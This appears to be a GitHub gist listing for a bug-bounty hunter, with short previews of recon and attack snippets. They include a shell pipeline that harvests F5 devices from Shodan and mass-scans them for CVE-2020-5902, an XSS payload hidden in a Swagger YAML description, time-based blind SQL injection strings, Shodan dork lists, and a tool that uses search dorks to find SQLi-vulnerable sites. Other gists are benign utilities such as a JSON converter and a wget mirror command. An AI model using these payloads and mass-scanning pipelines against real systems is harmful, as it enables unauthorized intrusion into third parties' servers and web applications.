marz-hunter
/ pinjerprint.js
Created
September 29, 2021 02:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (() => { | |
| let gadgets = []; | |
| if (typeof _satellite !== 'undefined') { | |
| gadgets.push('Adobe Dynamic Tag Management'); | |
| } | |
| if (typeof BOOMR !== 'undefined') { | |
| gadgets.push('Akamai Boomerang'); | |
| } |
marz-hunter
/ f5_here_i_come.sh
Created
March 8, 2022 02:52
— forked from LuD1161/f5_here_i_come.sh
F5 Slapdash attempt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570 | |
| python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt | |
| cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt | |
| cut -d" " -f3 results.txt > targets.txt | |
| sed -i -e "s/\.\;/\.\\\;/g" targets.txt # escape semicolon to pass to interlace | |
| interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt |
marz-hunter
/ test.yaml
Last active
May 17, 2022 01:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: XSS yaml.spec | |
| description: | | |
| <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(document.domain)'>"> | |
| paths: | |
| /accounts: | |
| get: | |
| responses: | |
| '200': |
marz-hunter
/ sslChainDeetz.py
Created
July 21, 2022 04:41
— forked from n0x08/sslChainDeetz.py
Shodan SSL Chain cert details
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # !/usr/bin/env python | |
| # sslChainDeetz.py | |
| # | |
| # Dependencies: | |
| # - shodan | |
| # - pyOpenSSL | |
| # | |
| # Installation: | |
| # sudo easy_install shodan | |
| # |
marz-hunter
/ shodanRecon
Created
July 21, 2022 04:43
— forked from ShubhamPy/shodanRecon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| org: org_name | |
| kibana content-length:217 | |
| org:”Amazon” ssl:”target” | |
| ssl:”target” | |
| html:”Dashboard Jenkins” http.component:”jenkins” | |
| http.title:”302 Found” | |
| http.component%3A”java” | |
| https://www.shodan.io/host/ip#9200 | |
| https://www.shodan.io/host/ip | |
| X-Redirect-By: WordPress ssl:”name” |
marz-hunter
/ dorks.py
Created
November 5, 2022 00:32
— forked from mvmthecreator/dorks.py
Search Bing and Google for Dorks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| ***** Auto-finder by dorks tool with Google API & Bing API ***** | |
| @author: z0rtecx | |
| @release date: dec-2014 | |
| @version: 1.0.12122014 | |
| @poc: good dork for find web pages whit SQLi vulnerability in ID parameter, e.g. "inurl:details.php?id=" | |
| @description: This tool is for save time for you. It is gathering dorks of a txt file, and search potential web pages with SQLi vulnerability. ONLY FOR MySQL errors. | |
| @features: |
marz-hunter
/ tsql
Created
December 10, 2022 00:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AND sleep(20)# | |
| '%2b(select*from(select(sleep(20)))a)%2b' | |
| 0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z |
marz-hunter
/ JSON to urlencoded.py
Created
January 2, 2023 02:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import json | |
| from urllib.parse import quote, quote_plus | |
| import sys | |
| import os | |
| import argparse | |
| parser = argparse.ArgumentParser( |
marz-hunter
/ ocr
Created
May 21, 2023 21:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://www.editpad.org/tool/extract-text-from-image |
marz-hunter
/ download site
Created
June 1, 2023 23:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget --mirror --convert-links --adjust-extension --page-requisites --no-parent |